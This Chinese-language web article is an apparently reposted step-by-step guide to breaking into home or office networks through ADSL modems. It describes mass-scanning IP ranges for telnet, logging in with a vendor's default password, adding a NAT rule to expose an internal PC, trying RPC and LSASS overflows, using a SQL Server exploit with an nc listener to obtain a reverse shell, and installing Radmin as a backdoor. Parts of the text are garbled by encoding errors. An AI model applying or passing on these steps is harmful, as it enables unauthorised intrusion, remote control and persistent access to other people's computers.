如何穿透ADSL路由入侵內(nèi)網(wǎng)

　　導(dǎo)語：關(guān)于如何穿透ADSL路由入侵內(nèi)網(wǎng)的方法，小編已經(jīng)給大家整理出來，請看下文!

　　1.掃描

　　現(xiàn)在很多ADSL MODEM都是通過80 23 21三個端口來管理，但80 21端口有很多服務(wù)器都有打開，沒怎么特征性，于是選擇了23端口，打開SUPPERSCAN，填上所在地區(qū)的IP段，跨多幾段都沒關(guān)系，反正SUPPERSCAN的速度就是快)眨眼間，結(jié)果出來了，開23的主機(jī)還真不小啊:)我挑了幾臺出來，在瀏覽器那里輸入IP:218.xxx.xxx.xxx，OK。登陸對話框出來了，輸入USER:ADSL pass:adsl1234(因為這里的adsl modem一般是華碩的，缺省是adsl adsl1234)bingle 一矢中的。

　　2.映射

　　入侵已經(jīng)成功了一半，要進(jìn)一步入侵內(nèi)網(wǎng)，要進(jìn)行端口映射，但是連內(nèi)網(wǎng)的拓?fù)洌�都不知�?更不用說內(nèi)網(wǎng)主機(jī)的端口開放情況了)又怎么映射呢?一般來說，MODEM的內(nèi)網(wǎng)IP缺省是192.168.1.1，而大多數(shù)就把自己主機(jī)的IP設(shè)成192.168.1.2。因此只要試試把192.168.1.2的端口映射出來就行了(但如果使用了dhcp就麻煩了)把整臺主機(jī)透明地映射到外網(wǎng)，具體做法如下:進(jìn)入NAT選項---添加NAT規(guī)則---BAMID---填入主機(jī)IP:192.168.1.2，到此192.168.1.2已經(jīng)透明地映射到192.168.1.1上了，訪問ADSL MODEM就等于訪問主機(jī)192.168.1.2了。

　　3.檢測漏洞

　　現(xiàn)在再請出SUPPERSCAN對218。xxx.xxx.xxx進(jìn)行掃描，掃描結(jié)果已經(jīng)不同了，開放的端口是139 1433等，剛才只是開放了80 23 21而已(也就是說映射已經(jīng)成功了)該是X-SCAN出手了，掃弱口令最好不過了。

　　4.溢出

　　既然沒有弱口令，也沒開80，那只好從逸出方面著手了，但沒開80 21 也就webdav .sevr-u的溢出沒戲了，向?qū)Я薘PC溢出，但實踐證明RPC溢出也是不行的，LSASS溢出也不行。

　　5.募然回首，那人卻在，燈火闌珊處

　　這時侯，目光轉(zhuǎn)移到1433上了，于是nc -v -l 99 sql2 218.xxx.xxx.xxx 0 218.xxx.xxx.xxx 99 bingle 成功地得到一個shell了。

　　6.設(shè)置后門

　　到這里，入侵已經(jīng)成功了，余下的是掃尾留后門，至于后門，用FTP上傳RADMIN上去就可以了。

【如何穿透ADSL路由入侵內(nèi)網(wǎng)】相關(guān)文章：

如何穿透ADSL路由來入侵內(nèi)網(wǎng)11-01

水星路由器內(nèi)網(wǎng)故障怎么辦06-14

路由器保護(hù)內(nèi)網(wǎng)安全九大步驟10-15

如何提高局域網(wǎng)內(nèi)網(wǎng)速07-28

如何檢查Linux是否被入侵07-21

路由器如何選06-13

如何挑選路由器11-07

如何設(shè)置無線路由09-18

如何重置路由器09-02